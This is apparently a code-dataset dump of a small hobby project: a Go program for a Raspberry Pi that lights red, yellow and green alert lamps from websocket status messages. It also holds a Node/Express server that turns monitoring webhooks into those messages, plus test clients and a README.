"no_license", "max_line_length": 68, "num_lines": 338, "path": "/client/main.go", "repo_name": "apparentlymart/failinator", "src_encoding": "UTF-8", "text": "package main\n\nimport (\n\t\"encoding/json\"\n\t\"log\"\n\t\"sync\"\n\t\"time\"\n\n\t\"github.com/kidoman/embd\"\n\t_ \"github.com/kidoman/embd/host/rpi\"\n\t\"golang.org/x/net/websocket\"\n)\n\ntype Status struct {\n\tWarning bool `json:\"warning\"`\n\tCritical bool `json:\"critical\"`\n\tPaging bool `json:\"paging\"`\n\tLastPageTime int `json:\"lastAlert\"`\n\n\t// Lock before interacting with the object.\n\tsync.Mutex\n}\n\nvar quit bool\nvar status Status\nvar statusMutex sync.Mutex\n\ntype Lights struct {\n\tredPin embd.DigitalPin\n\tyellowPin embd.DigitalPin\n\tgreenPin embd.DigitalPin\n}\n\nfunc OpenLights() (*Lights, error) {\n\tredPin, err := embd.NewDigitalPin(2)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tyellowPin, err := embd.NewDigitalPin(3)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tgreenPin, err := embd.NewDigitalPin(4)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tif err := redPin.SetDirection(embd.Out); err != nil {\n\t\tpanic(err)\n\t}\n\tif err := yellowPin.SetDirection(embd.Out); err != nil {\n\t\tpanic(err)\n\t}\n\tif err := greenPin.SetDirection(embd.Out); err != nil {\n\t\tpanic(err)\n\t}\n\n\tl := &Lights{\n\t\tredPin: redPin,\n\t\tyellowPin: yellowPin,\n\t\tgreenPin: greenPin,\n\t}\n\n\treturn l, nil\n}\n\nfunc (l *Lights) Close() error {\n\tl.redPin.Close()\n\tl.yellowPin.Close()\n\tl.greenPin.Close()\n\treturn nil\n}\n\ntype Digits struct {\n\tmosiPin embd.DigitalPin\n\tclkPin embd.DigitalPin\n\tcsPin embd.DigitalPin\n}\n\nfunc (d *Digits) sendByte(b byte) error {\n\n\treturn nil\n}\n\nfunc OpenDigits() (*Digits, error) {\n\tmosiPin, err := embd.NewDigitalPin(10)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tclkPin, err := embd.NewDigitalPin(11)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tcsPin, err := embd.NewDigitalPin(8)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tif err := mosiPin.SetDirection(embd.Out); err != nil {\n\t\tpanic(err)\n\t}\n\tif err := clkPin.SetDirection(embd.Out); err != nil {\n\t\tpanic(err)\n\t}\n\tif err := 
csPin.SetDirection(embd.Out); err != nil {\n\t\tpanic(err)\n\t}\n\n\treturn &Digits{\n\t\tmosiPin: mosiPin,\n\t\tclkPin: clkPin,\n\t\tcsPin: csPin,\n\t}, nil\n}\n\nfunc (d *Digits) Close() error {\n\td.clkPin.Close()\n\td.mosiPin.Close()\n\td.csPin.Close()\n\treturn nil\n}\n\nfunc (d *Digits) write(val uint16) error {\n\terr := d.csPin.Write(embd.High)\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = d.csPin.Write(embd.Low)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\tfor i := 16; i > 0; i-- {\n\t\tmask := uint16(1 << uint16(i-1))\n\n\t\terr := d.clkPin.Write(0)\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\n\t\tif val&mask != 0 {\n\t\t\terr = d.mosiPin.Write(1)\n\t\t} else {\n\t\t\terr = d.mosiPin.Write(0)\n\t\t}\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\n\t\terr = d.clkPin.Write(1)\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\t}\n\n\terr = d.csPin.Write(embd.High)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\treturn nil\n}\n\nfunc (d *Digits) Try() error {\n\tfor {\n\t\terr := d.write(0xffff)\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\t\ttime.Sleep(1000 * time.Millisecond)\n\t\terr = d.write(0x0000)\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\t\ttime.Sleep(1000 * time.Millisecond)\n\t}\n\treturn nil\n}\n\nfunc hardware() {\n\tif err := embd.InitGPIO(); err != nil {\n\t\tpanic(err)\n\t}\n\tdefer embd.CloseGPIO()\n\n\tif err := embd.InitSPI(); err != nil {\n\t\tpanic(err)\n\t}\n\tdefer embd.CloseSPI()\n\n\tlights, err := OpenLights()\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\tdefer lights.Close()\n\n\tdigits, err := OpenDigits()\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\tdefer digits.Close()\n\n\tgo digits.Try()\n\n\tfor !quit {\n\t\tstatusMutex.Lock()\n\t\tyellow := status.Warning\n\t\tred := status.Critical\n\t\tredBlink := status.Paging\n\t\tgreen := !(red || yellow)\n\t\t//lastPageTime := status.LastPageTime\n\t\tstatusMutex.Unlock()\n\n\t\tvar redVal int\n\t\tvar yellowVal int\n\t\tvar greenVal int\n\t\tif red {\n\t\t\tredVal = embd.High\n\t\t}\n\t\tif yellow {\n\t\t\tyellowVal = embd.High\n\t\t}\n\t\tif green {\n\t\t\tgreenVal = embd.High\n\t\t}\n\t\tlights.redPin.Write(redVal)\n\t\tlights.yellowPin.Write(yellowVal)\n\t\tlights.greenPin.Write(greenVal)\n\t\ttime.Sleep(500 * time.Millisecond)\n\t\tif red && redBlink {\n\t\t\tlights.redPin.Write(embd.Low)\n\t\t}\n\t\ttime.Sleep(500 * time.Millisecond)\n\t}\n}\n\nfunc powerOnTest() {\n\tstatusMutex.Lock()\n\tstatus.Warning = false\n\tstatus.Critical = false\n\tstatus.Paging = false\n\tstatus.LastPageTime = 0\n\tstatusMutex.Unlock()\n\ttime.Sleep(2 * time.Second)\n\n\tstatusMutex.Lock()\n\tstatus.Warning = true\n\tstatus.Critical = false\n\tstatus.Paging = false\n\tstatus.LastPageTime = 1\n\tstatusMutex.Unlock()\n\ttime.Sleep(2 * time.Second)\n\n\tstatusMutex.Lock()\n\tstatus.Warning = false\n\tstatus.Critical = true\n\tstatus.Paging = false\n\tstatus.LastPageTime = 2\n\tstatusMutex.Unlock()\n\ttime.Sleep(2 * time.Second)\n\n\tstatusMutex.Lock()\n\tstatus.Warning = false\n\tstatus.Critical = false\n\tstatus.Paging = false\n\tstatus.LastPageTime = 2\n\tstatusMutex.Unlock()\n\ttime.Sleep(2 * time.Second)\n\n\tstatusMutex.Lock()\n\tstatus.LastPageTime = 3\n\tstatusMutex.Unlock()\n\ttime.Sleep(1 * time.Second)\n\n\tstatusMutex.Lock()\n\tstatus.LastPageTime = 4\n\tstatusMutex.Unlock()\n\ttime.Sleep(1 * time.Second)\n\n\tstatusMutex.Lock()\n\tstatus.LastPageTime = 5\n\tstatusMutex.Unlock()\n\ttime.Sleep(1 * time.Second)\n\n\tstatusMutex.Lock()\n\tstatus.LastPageTime = 0\n\tstatusMutex.Unlock()\n}\n\nfunc socket() {\n\thost 
:= \"ec2-54-183-68-122.us-west-1.compute.amazonaws.com:3000\"\n\twsUrl := \"ws://\" + host + \"/failinator\"\n\toriginUrl := \"http://\" + host\n\n\tfor {\n\t\tvar conn *websocket.Conn\n\t\tvar err error\n\t\tfor {\n\t\t\tconn, err = websocket.Dial(wsUrl, \"\", originUrl)\n\t\t\tif err != nil {\n\t\t\t\tlog.Println(\"Error connecting to\", wsUrl, err)\n\t\t\t\ttime.Sleep(2 * time.Second)\n\t\t\t\tcontinue\n\t\t\t}\n\t\t\tbreak\n\t\t}\n\t\tdefer conn.Close()\n\n\t\tfor {\n\t\t\tmsg := make([]byte, 512)\n\t\t\tn, err := conn.Read(msg)\n\t\t\tif err != nil {\n\t\t\t\tbreak\n\t\t\t}\n\t\t\tmsg = msg[:n]\n\n\t\t\tstatus.Lock()\n\t\t\tlog.Println(\"Message\", string(msg))\n\t\t\terr = json.Unmarshal(msg, &status)\n\t\t\tstatus.Unlock()\n\n\t\t\tif err != nil {\n\t\t\t\t// Just skip an invalid message.\n\t\t\t\tlog.Println(\"Skipping invalid message: \", err)\n\t\t\t\tcontinue\n\t\t\t}\n\t\t}\n\n\t\tlog.Println(\"Error reading from socket. Will try to reconnect...\")\n\t\ttime.Sleep(2 * time.Second)\n\t}\n}\n\nfunc main() {\n\tgo hardware()\n\tpowerOnTest()\n\tsocket()\n}\n" }, { "alpha_fraction": 0.6493212580680847, "alphanum_fraction": 0.6538461446762085, "avg_line_length": 30.5, "blob_id": "3935954b10b4331c1859f6e4e264978d6feefaee", "content_id": "8d5108db537d1cc412eebcfca04afc13189f72f0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 442, "license_type": "no_license", "max_line_length": 61, "num_lines": 14, "path": "/server/test_client_reads.js", "repo_name": "apparentlymart/failinator", "src_encoding": "UTF-8", "text": "\nvar SERVER_PORT = process.env.SERVER_PORT || 80;\n\nvar WebSocket = require('ws');\nvar ws = new WebSocket('ws://localhost:' + SERVER_PORT);\n\nws.on('open', function open() {\n console.log('[test_client_reads]: open');\n});\n\nws.on('message', function(data, flags) {\n // flags.binary will be set if a binary data is received.\n // flags.masked will be set if the data was masked.\n console.log('[test_client_reads] received:', data);\n});\n" }, { "alpha_fraction": 0.7448559403419495, "alphanum_fraction": 0.7448559403419495, "avg_line_length": 29.25, "blob_id": "6defa2cddc8a23aac99ad1a7d76f475f3b851f94", "content_id": "058d01b1cc8ed8c74f335def98683a808ecaac3b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 243, "license_type": "no_license", "max_line_length": 80, "num_lines": 8, "path": "/client/README.md", "repo_name": "apparentlymart/failinator", "src_encoding": "UTF-8", "text": "Failinator Client\n=================\n\nThe *client* portion of Failinator is what runs on the Raspberry Pi and controls\nthe devices on the custom PCB.\n\nIt connects to the server to recieve push notifications of data via a\nwebsocket connection.\n\n" }, { "alpha_fraction": 0.6016949415206909, "alphanum_fraction": 0.6186440587043762, "avg_line_length": 27.413793563842773, "blob_id": "ac9aa342b6424cb3fd14247aa4e2733d40f0cf4a", "content_id": "07445f1d6e152306ca867c6c23fd092a52905558", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 826, "license_type": "no_license", "max_line_length": 58, "num_lines": 29, "path": "/server/test_client_writes.js", "repo_name": "apparentlymart/failinator", "src_encoding": "UTF-8", "text": "\nvar SERVER_PORT = process.env.SERVER_PORT || 80;\n\nvar WebSocket = require('ws');\nvar ws = new WebSocket('ws://localhost:' + SERVER_PORT);\n\n\nfunction clientMessage (warning, critical, 
paging) {\n var out = {\n warning: warning,\n critical: critical,\n paging: paging,\n };\n console.log('[server] clientMessage', out);\n return JSON.stringify(out);\n}\nfunction write (warning, critical, paging, interval) {\n setInterval(function () {\n ws.send(clientMessage(warning, critical, paging));\n }, interval * 1000);\n}\n\nws.on('open', function open() {\n ws.send(clientMessage(true, false, false));\n\n // write(true, false, false, 12); // warning\n // write(true, true, false, 14); // critical\n // write(true, true, true, 18); // paging\n // write(false, false, false, 20); // okay\n});\n\n" }, { "alpha_fraction": 0.5898370742797852, "alphanum_fraction": 0.5981035828590393, "avg_line_length": 24.376543045043945, "blob_id": "5b3aee9331fb55cf75b158c2cda4e7a626457b85", "content_id": "8f1397e20a4fbde04e61ccb91b0422cf261d29c5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 4113, "license_type": "no_license", "max_line_length": 87, "num_lines": 162, "path": "/server/server.js", "repo_name": "apparentlymart/failinator", "src_encoding": "UTF-8", "text": "\nvar SERVER_PORT = process.env.SERVER_PORT || 80;\nvar LAST_ALERT_FILE = process.env.LAST_ALERT_FILE || '.last_alert';\nvar WEBSITE = process.env.WEBSITE || '../website/index.html';\nvar LAST_ALERT = 1444444444; // test date\nvar ALERT_STATUS = null;\n\n\nvar server = require('http').createServer(),\n fs = require('fs'),\n url = require('url'),\n bodyParser = require(\"body-parser\"),\n WebSocketServer = require('ws').Server,\n wss = new WebSocketServer({ server: server }),\n express = require('express'),\n app = express(),\n port = SERVER_PORT;\n\n\n// Middleware\napp.use(bodyParser.urlencoded({ extended: false }));\n\n// Website\napp.get('/', function(req, res){\n var data = fs.readFileSync(WEBSITE);\n res.setHeader('Content-Type', 'text/html');\n res.end(data);\n});\n\n// Api\napp.get('/api/webhook', function (req, res) {\n res.setHeader('Content-Type', 'text/html');\n res.end('This endpoint only accepts POST requests.');\n});\napp.post('/api/webhook', function (req, res) {\n console.log('[server] webhook', req.body);\n var type = req.body.message_type;\n\n if (type === 'critical')\n {\n console.log('[server-webhook] critical');\n ALERT_STATUS = 'paging';\n onMessage(clientMessage(false, true, true));\n }\n else if (type === 'warning')\n {\n console.log('[server-webhook] warning');\n ALERT_STATUS = 'warning';\n onMessage(clientMessage(true, false, false));\n }\n else if (type === 'resolved')\n {\n console.log('[server-webhook] resolved');\n ALERT_STATUS = 'okay';\n onMessage(clientMessage(false, false, false));\n }\n else if (type === 'ack')\n {\n console.log('[server-webhook] ack');\n ALERT_STATUS = 'critical';\n onMessage(clientMessage(true, true, false));\n }\n});\n\n// Static\napp.use(express.static(__dirname + '/../website'));\n\n\nwss.broadcast = function broadcast(data) {\n wss.clients.forEach(function each(client) {\n client.send(data);\n });\n};\n\n\nfunction clientMessage (warning, critical, paging) {\n var out = {\n lastAlert: LAST_ALERT,\n warning: warning,\n critical: critical,\n paging: paging,\n };\n console.log('[server] clientMessage', out);\n return JSON.stringify(out);\n}\nfunction getLastAlert (cb) {\n fs.stat(LAST_ALERT_FILE, function (err, stats) {\n if (!err && stats.isFile()) {\n var data = fs.readFileSync(LAST_ALERT_FILE);\n if (data) {\n cb(parseInt(data.toString()));\n }\n }\n });\n}\nfunction setLastAlert () {\n var timestamp = 
Math.floor(Date.now() / 1000);\n\n fs.writeFileSync(LAST_ALERT_FILE, timestamp);\n LAST_ALERT = timestamp;\n}\n\nfunction onMessage (message) {\n var data = null;\n try {\n data = JSON.parse(message);\n } catch (e) {\n data = message;\n }\n console.log('[server] received:', data);\n\n var warning = false,\n critical = false,\n paging = false;\n\n if (data.warning) {\n warning = true;\n }\n if (data.critical) {\n critical = true;\n }\n if (data.paging) {\n paging = true;\n // save the last alert date for a restart\n setLastAlert();\n }\n\n wss.broadcast(clientMessage(warning, critical, paging));\n}\n\n\nwss.on('connection', function connection(ws) {\n var location = url.parse(ws.upgradeReq.url, true);\n // console.log('loc', location);\n // you might use location.query.access_token to authenticate or share sessions\n // or ws.upgradeReq.headers.cookie (see http://stackoverflow.com/a/16395220/151312)\n\n ws.on('message', onMessage);\n\n console.log('[server] connected.');\n\n\n // ws.send('something!');\n // setTimeout(function () {\n // wss.broadcast('new client: ' + location.path);\n // }, 1000);\n\n\n getLastAlert(function (timestamp) {\n LAST_ALERT = timestamp;\n });\n});\n\n\nserver.on('request', app);\nserver.listen(port, function () {\n console.log('[server] Listening on ' + server.address().port);\n});\n\n\nrequire('./test_client_reads');\nrequire('./test_client_writes');\nrequire('./test_webhook_write');\n\n" } ]
6
nishantpuri01/net-auto
https://github.com/nishantpuri01/net-auto
3918fea1d3f9d7baff07a6d7c45b75174bcefd5e
1d8803eb0b0c3c35ceb05e28e8c4af34f8c7a016
b92a14be16baef1651fe88d7ccb95a6756516f96
refs/heads/main
2023-01-08T00:32:07.633368
2023-01-03T21:06:20
2023-01-03T21:06:20
303,597,683
0
0
null
2020-10-13T05:30:03
2023-01-03T19:41:44
2023-01-03T21:06:20
Python
[ { "alpha_fraction": 0.5277901291847229, "alphanum_fraction": 0.5429079532623291, "avg_line_length": 24.654762268066406, "blob_id": "89536c01c6214daa4a06983dd42c3bf1fe24b44a", "content_id": "8eb659281fb99013919aa019d9073c59d4cbb911", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2249, "license_type": "no_license", "max_line_length": 73, "num_lines": 84, "path": "/ssh.py", "repo_name": "nishantpuri01/net-auto", "src_encoding": "UTF-8", "text": "import sys\r\nimport os.path\r\nimport paramiko\r\nimport time\r\nimport re\r\nimport string\r\n\r\nufile = \"user.txt\"\r\nif os.path.isfile(ufile) == True:\r\n print(\"**user's file found**\")\r\nelse:\r\n print(\"/// Error, File not found..!\")\r\n\r\ncmdfile = \"command.txt\"\r\nif os.path.isfile(cmdfile) == True:\r\n print(\"**Command file found**\")\r\nelse:\r\n print(\"/// Error, File not found..!\")\r\n\r\n\r\ndef ssh(ip):\r\n\r\n global ufile\r\n global cmdfile\r\n\r\n try:\r\n sel_ufile = open(ufile,\"r\")\r\n sel_ufile.seek(0)\r\n\r\n user = sel_ufile.readlines()[0].split(\",\")[0].rstrip(\"\\n\")\r\n sel_ufile.seek(0)\r\n pwd = sel_ufile.readlines()[0].split(\",\")[1].rstrip(\"\\n\")\r\n sel_ufile.seek(0)\r\n #print(\"selected users id is {}\" .format(username))\r\n #print(\"selected users passwrd is {}\" .format(password))\r\n\r\n session = paramiko.SSHClient()\r\n session.set_missing_host_key_policy(paramiko.AutoAddPolicy())\r\n session.connect(ip.rstrip(\"\\n\"), username=user , password=pwd)\r\n #print(conn)\r\n \r\n connection = session.invoke_shell()\r\n\r\n connection.send(\"enable \\n\")\r\n connection.send(\"terminal length 0 \\n\")\r\n time.sleep(2)\r\n\r\n sel_cmdfile = open(cmdfile , \"r\")\r\n sel_cmdfile.seek(0)\r\n\r\n for lines in sel_cmdfile.readlines():\r\n connection.send(lines + \"\\n\")\r\n time.sleep(1)\r\n\r\n\r\n sel_ufile.close()\r\n sel_cmdfile.close()\r\n\r\n\r\n router_output = connection.recv(65535)\r\n #print(router_output)\r\n if re.search(b\"% Invalid input\",router_output):\r\n print(\"syntax error detected in device {}\" .format(ip))\r\n else:\r\n print(\"DONE for device {}\" .format(ip))\r\n\r\n\r\n search_string = re.search(b\"seconds:(\\s)+([0-9]+)\",router_output)\r\n utilize = search_string.group(2).decode(\"utf-8\")\r\n \r\n \r\n \r\n #CPU_det = CPU.group(2).decode(\"utf-8\")\r\n print(utilize)\r\n\r\n with open(\"cpu.txt\" , \"a\") as cpu_file:\r\n cpu_file.write(utilize + \"\\n\")\r\n\r\n session.close()\r\n \r\n except paramiko.AuthenticationException:\r\n print(\"***Invalid username or password***\")\r\n\r\nssh(\"192.168.195.161\")\r\n\r\n\r\n\r\n\r\n\r\n" }, { "alpha_fraction": 0.7892223596572876, "alphanum_fraction": 0.7892223596572876, "avg_line_length": 121.16666412353516, "blob_id": "7374ace259eb0ab169c663ba1ce92293171aa7cd", "content_id": "e95ca2f7c0137f5290bb33f43c68b9aa803637a7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1466, "license_type": "no_license", "max_line_length": 294, "num_lines": 12, "path": "/README.md", "repo_name": "nishantpuri01/net-auto", "src_encoding": "UTF-8", "text": "# net-auto\nThis is a simple example for network automation where we are initiating an ssh connection to connect to a device using an IP address.\nThe code requires a \"user.txt\" file that contains username and password for our ssh connection and a \"command.txt\" file that contains all the command that we need to execute on our device, although to make it simple , we are only 
using a single-line command to read the CPU usage of the device.\r\nThe code uses some very basic modules such as sys, os and time; however, the two main modules that actually make the task possible are \"paramiko\" (pip install paramiko) for the SSH connection and \"re\" for the regular expressions (part of the Python standard library, so no install is needed) that pull a specific string out of a long output.\r\n\r\nWorking --\r\n\r\nWhen the code is executed, it verifies the presence of the \"user.txt\" and \"command.txt\" files, then makes the SSH connection and executes the commands on the device.\r\nIn our example here we have used a single command, but the code can equally handle multi-line command files.\r\nHere we are using a command to check the CPU usage of the device; after the command is executed, the code searches the output received from the device for a specific number (the CPU usage) and writes it to another file (\"cpu.txt\").\r\n\r\nFor now the code uses a single IP address to connect, but it can be modified to read multiple IP addresses from another file or from a list and to use threading to initiate SSH connections to all the devices at the same time.\r\n" } ]
2
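A small, self-contained restatement of the regex step the README above describes: pulling the CPU figure out of a device's command output. The sample output string is made up, not captured from a real device, and unlike the unguarded `search_string.group(2)` call in `ssh.py`, this version checks for a failed match before reading the group.

```python
import re

# Hypothetical captured CLI output; a real device would return something similar.
router_output = "CPU utilization for five seconds: 7%; one minute: 5%"

match = re.search(r"seconds:\s+(\d+)", router_output)
if match:  # guard: re.search returns None when the pattern is absent
    cpu = match.group(1)
    with open("cpu.txt", "a") as cpu_file:
        cpu_file.write(cpu + "\n")
    print("CPU usage:", cpu)
else:
    print("CPU figure not found in output")
```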
yashnagda04/flask-tutorial
https://github.com/yashnagda04/flask-tutorial
ab1290395eb52deb17ec58b24c524e6b27a96434
782a8fcdcefecc42cad3cb1730de311ef8dfe501
8db0b1a6d4d7dbfde3e15da39c61410874dd2dd1
refs/heads/master
2023-06-09T03:10:52.321984
2020-05-14T18:00:43
2020-05-14T18:00:43
263,987,679
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6039473414421082, "alphanum_fraction": 0.6092105507850647, "avg_line_length": 27.185184478759766, "blob_id": "7a34c825475993fbf823b79272e5a517fb433a67", "content_id": "a8801c527b42dea2df28cc4da2d6cc8e752c62f2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 760, "license_type": "no_license", "max_line_length": 84, "num_lines": 27, "path": "/app.py", "repo_name": "yashnagda04/flask-tutorial", "src_encoding": "UTF-8", "text": "from flask import Flask,render_template,request\napp = Flask(__name__)\n\[email protected]('/')\ndef hello_world():\n return 'hello world!!'\n\[email protected]('/home')\ndef greetUser():\n return render_template('home.html')\n\[email protected]('/test',methods=['GET', 'POST'])\ndef calculateResult():\n if request.method == 'POST':\n height=request.form['height']\n message=''\n if height == '8848':\n message=\"Your Answer:\"+height+\"\\nYou have passed the test,Keep it up.\"\n else:\n message=\"Your Answer:\"+height+\"\\nYou have failed the test, keep trying.\"\n\n return render_template('test.html', message=message) \n else:\n return render_template('test.html', message='')\n\nif __name__ == \"__main__\":\n app.run(debug=True)" } ]
1
prateekvij/FrontEnd-C-Compiler
https://github.com/prateekvij/FrontEnd-C-Compiler
b07862be3ebe282ab26dcfab745da7b98a9f754f
9661c61b84030d46003ebed2f23551b8d65ec437
5a3dd62022952f7cef137dc403d9945e6ca6a723
refs/heads/master
2023-03-03T08:00:44.206264
2017-10-06T16:59:01
2017-10-06T16:59:01
106,025,750
4
2
null
2017-10-06T16:20:20
2022-07-05T21:06:20
2023-02-26T17:06:46
Yacc
[ { "alpha_fraction": 0.6055607795715332, "alphanum_fraction": 0.6446748375892639, "avg_line_length": 18.290908813476562, "blob_id": "c6da5a48fcd6d2f0f2f59e8e51a21bafc040fb23", "content_id": "ace026b278d763f116483372df2ad71a30a2c411", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2122, "license_type": "no_license", "max_line_length": 236, "num_lines": 110, "path": "/README.md", "repo_name": "prateekvij/FrontEnd-C-Compiler", "src_encoding": "UTF-8", "text": "# FrontEnd-C-Compiler\n\n\nThe following is an implementation of front-end C compiler using flex and bison. The program takes a C-program as input and perform syntax parsing, semantic analysis and Intermediate Code Generation. The parser is based on LALR grammar.\n\nIf the input C program is valid, program output Symbol table along with intermediate code.\n\n\nTo compile the code, run\n```bash \n$ make\n```\nTo recompile. run\n```\n$ make clean\n$ make\n```\n\nThe program need bison and flex installed. You can install them by\n```bash\n$ sudo apt-get install bison\n$ sudo apt-get install flex\n```\n\nThe list of supported tokens is given in file \"tokens\". If you want to add or remove tokens, make changes in the file \"tokens\". Then, run\n```bash\n$ python generate_tokens.py\n```\nThis will generate \"tokens.h\" which is used by the program.\n\nTo run the code, write the sample code to parse in file \"input\". Now run the command\n```bash\n$ ./c_parser < input\n```\n\n### About the code\n1. **c_parser.y**: Primary file containing the grammer for parsing and semantic analysis.\n2. **c_parser.l**: Contains regex and token_strings for converting strings to tokens.\n3. **symtable.h**: Code for symbol table generation and maintainance. \n4. 
**tokens.h**: Contains tokens for flex parsing\n\n### Examples\n\n```c\nint max(int a,int b){\n\tif ( a > b ){\n\t\t return a;\n\t}\n\treturn b;\n}\nint main(){\n\t\n\tint a, b;\n\ta = 2;\n\tb = 5;\n\tint c;\n\tif ( a > b) {\n\t\treturn b;\n\t\twhile( b > 0 ){\n\t\t\tc = c+1;\n\t\t\tb = b-1;\n\t\t}\n\t}\n\treturn 0;\n}\n```\n\nOutput\n```bash\nSymbol Table\n$global\t\t0\n\t>>Name: $global\n\t>>Param count: 0\n\t>>Params : \n\t>>Var : \nmax\tint\t2\n\t>>Name: max\n\t>>Param count: 2\n\t>>Params : a(int)(1) b(int)(1) \n\t>>Var : \nmain\tint\t0\n\t>>Name: main\n\t>>Param count: 0\n\t>>Params : \n\t>>Var : a(int)(2) simple b(int)(2) simple c(int)(2) simple \n\n0 func begin max\n1 t1 = a > b\n2 if (t1 == 0) goto 4\n3 return a\n4 return b\n5 func end\n6 func begin main\n7 a = 2\n8 b = 5\n9 t2 = a > b\n10 if (t2 == 0) goto 20\n11 return b\n12 t3 = b > 0\n13 if (t3 == 0) goto 20\n14 t4 = a * 3\n15 t5 = c + t4\n16 c = t5\n17 t6 = b - 1\n18 b = t6\n19 goto 12\n20 return 0\n21 func end\n\n```\n" }, { "alpha_fraction": 0.6260162591934204, "alphanum_fraction": 0.6341463327407837, "avg_line_length": 21.272727966308594, "blob_id": "dfe29a348c7120048d01df9c78e3cb7574f17525", "content_id": "6892a4c4cd13aafad4f34266d4f6baae1279be93", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Makefile", "length_bytes": 246, "license_type": "no_license", "max_line_length": 63, "num_lines": 11, "path": "/Makefile", "repo_name": "prateekvij/FrontEnd-C-Compiler", "src_encoding": "UTF-8", "text": "c_parser: lex.yy.c y.tab.c \n\tg++ lex.yy.c y.tab.c -o c_parser -g -w -fpermissive -std=c++11\n\nlex.yy.c: y.tab.c c_parser.l\n\tlex c_parser.l\n\ny.tab.c: c_parser.y\n\tyacc -d -v -Wconflicts-sr c_parser.y \n\nclean: \n\trm lex.yy.c y.tab.c y.tab.h c_parser\n\n" }, { "alpha_fraction": 0.6425942182540894, "alphanum_fraction": 0.6466257572174072, "avg_line_length": 28.112245559692383, "blob_id": "6d0a70722b42d0fc318fabfad28a916e3480c8f9", "content_id": "8fafc7d0af529554d2e88f5dec7703be8aa89f83", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 5705, "license_type": "no_license", "max_line_length": 202, "num_lines": 196, "path": "/symtable.h", "repo_name": "prateekvij/FrontEnd-C-Compiler", "src_encoding": "UTF-8", "text": "class VarNameRecord {\npublic:\n\tstring name, type, var_tag;\n\tint level;\n\tvector<int>* dimlist_ptr;\n};\n\nclass FuncNameRecord {\npublic:\n\tstring name, result_type; \n\tvector<VarNameRecord> paramlist_ptr, loc_varlist_ptr;\n\tint num_params;\n\tbool returned;\n};\n\nclass SymTable {\npublic:\n\tvector<FuncNameRecord> func_name_table;\n\tint search_func(string n, bool* found);\n\tint search_param(string p, bool* found, int fnptr);\n\tint search_var(string v, int fnptr, int l, bool* found);\n\tvoid print_symTable();\n\tvoid print_funcTable(int fnptr);\n\tint add_function(string name, string result_type\n\t\t);\n\tint add_param(int fn_ptr, string param_name, string type);\n\tint add_var(int fn_ptr, string var_name, string type, int level, string var_tag, vector<int> *dimlist_ptr);\n\tint patch(string type, list<int> *var_list, int level);\n\tvoid check_param_type(int call_ptr, int param_num, string type, bool &ok);\n};\n\nstruct Node {\n// public:\n\tmap<string, string> attr;\n\tmap<string, vector<int>* > attr_list;\n\tlist<int> *namelist;\n};\n\nSymTable* symtab = new SymTable;\n\n\nint active_func_ptr = 0; // suggest global\nint current_level = 0;\nint call_name_ptr = 0;\n\nstack<int> curr_func_stack;\n\n\n/**\n * Returns 
fnptr of the function with name n.\n */\nint SymTable::search_func(string n, bool* found) {\n\t*found = false;\n\n\tfor (int i=0; i<(symtab->func_name_table).size(); i++) {\n\t\tif (n == symtab->func_name_table[i].name) {\n\t\t\t*found = true;\n\t\t\treturn i;\n\t\t}\n\t}\n\n\treturn -1;\n}\n\n/**\n * Returns pnptr of the parameter of function fnptr with name p.\n */\nint SymTable::search_param(string p, bool* found, int fnptr) {\n\t*found = false;\n\n\tfor (int i=0; i<(symtab->func_name_table)[fnptr].paramlist_ptr.size();i++) {\n\t\tif (p == (symtab->func_name_table)[fnptr].paramlist_ptr[i].name) {\n\t\t\t*found = true;\n\t\t\treturn i;\n\t\t}\n\t}\n\n\treturn -1;\n}\n\n/**\n * Returns vnptr of the variable of function fnptr with name v.\n */\nint SymTable::search_var(string v, int fnptr, int l, bool* found) {\n\t*found = false;\n\tint x = symtab->func_name_table[fnptr].loc_varlist_ptr.size();\n\tfor (int i=0; i<(symtab->func_name_table)[fnptr].loc_varlist_ptr.size(); i++) {\n\t\tif (v == (symtab->func_name_table)[fnptr].loc_varlist_ptr[i].name && l >= (symtab->func_name_table)[fnptr].loc_varlist_ptr[i].level) {\n\t\t\t*found = true;\n\t\t\treturn i;\n\t\t}\n\t}\n\n\treturn -1;\n}\n\n\nvoid SymTable::print_symTable(){\n\n\tcout << \"Symbol Table\" << endl;\n\tfor (int i=0; i<(symtab->func_name_table).size(); i++) {\n\t\tcout << symtab->func_name_table[i].name << \"\\t\" << symtab->func_name_table[i].result_type << \"\\t\" << symtab->func_name_table[i].num_params << endl;\n\t\tprint_funcTable(i);\n\t}\n\tcout << \"\" << endl;\n}\n\nvoid SymTable::print_funcTable(int fnptr){\n\tcout << \"\\t>>Name: \" << symtab->func_name_table[fnptr].name << \"\\n\";\n\tcout << \"\\t>>Param count: \" << symtab->func_name_table[fnptr].num_params << endl;\n\tcout << \"\\t>>Params : \";\n\tfor (int i = 0; i < (symtab->func_name_table[fnptr].paramlist_ptr).size(); 